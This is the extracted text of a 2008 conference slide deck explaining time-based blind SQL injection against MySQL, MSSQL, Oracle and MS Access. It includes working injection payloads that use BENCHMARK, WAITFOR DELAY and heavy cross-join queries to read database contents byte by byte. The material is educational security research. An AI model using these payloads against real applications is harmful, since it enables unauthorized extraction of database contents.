Professional Documents
Culture Documents
1
2008 Security-Assessment.com
Who am I
2
2008 Security-Assessment.com
Agenda
What is time based SQL Injection Differences between blind and time based SQL Injection Time based injection with heavy queries Limitation of time based SQL Injection
3
2008 Security-Assessment.com
In Band Injection
4
2008 Security-Assessment.com
In Band Injection
5
2008 Security-Assessment.com
In Band Injection
6
2008 Security-Assessment.com
7
2008 Security-Assessment.com
Web server
OOB Injection
Database B
10.1.1.1
Database A 8
2008 Security-Assessment.com
Application generates custom error message for failed response and normal page for successful response Comparison between true and false response AND 1=1 -> true AND 1=2 -> false Read data byte by byte
9
2008 Security-Assessment.com
10
2008 Security-Assessment.com
11
2008 Security-Assessment.com
Use time delay to differentiate between true and false True response time delay is executed Failed response time delay is not executed Read data byte by byte exactly the same method as blind injection
Injection
12
2008 Security-Assessment.com
When the application generates default page for true or false response When the application generates the same custom error page for true or false response Injection is successful but can't be seen by the attacker
13
2008 Security-Assessment.com
14
2008 Security-Assessment.com
15
2008 Security-Assessment.com
FALSE = 117ms
TRUE = 2478ms
16
2008 Security-Assessment.com
Blind Injection (for MySql) 1 AND ASCII(substring((@@version),1,1))<52 If the first character of the database version is less than 4, it is true If the first character of database version is 4 or more, it is false
query position operator
char
17
2008 Security-Assessment.com
Time Based Blind injection (for MySQL) 1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1)) If the first character of database version is less than 4, execute BENCHMARK If the first character of database version is not less than 4,do not execute BENCHMARK
char
query count time
operator position
time delay
18
2008 Security-Assessment.com
Time Based Injection (MSSQL) 1 AND if not(substring((select @version),25,1) < 52) waitfor delay '0:0:9'-If the first character less than 4, execute waitfor delay
19
2008 Security-Assessment.com
Other Databases
Oracle (without PL/SQL support) MS Access, DB2 do not have delay functions Time Based Injection is possible by using heavy queries Chema Alonso and Jose Prada talked about this in Defcon 2008 2 types of conditions in 'where clause' Light Condition first Heavy Condition first Select A from B where ConditionA and ConditionB
20
2008 Security-Assessment.com
Result
True
True
True
False
False
21
2008 Security-Assessment.com
Result
True
True
True
False
False
22
2008 Security-Assessment.com
Heavies Queries
Oracle - all_users
23
2008 Security-Assessment.com
Heavies Queries
Example of time based injection using heavy queries on MSSQL (light condition evaluates first) 1 AND (select count(*) FROM sysusers as sys1, sys2, sysusers as sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8)> 0 AND 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers) Suitable for databases that do not support time delay functions Ex: Oracle and MS Access
heavy query
light query
24
2008 Security-Assessment.com
Limitation
Results are not efficient during the busy times Time delay results also depend on how much data stored in the table
25
2008 Security-Assessment.com
Demo
26
2008 Security-Assessment.com
Question ?
muhaimin.dzulfakar@security-assessment.com
27
2008 Security-Assessment.com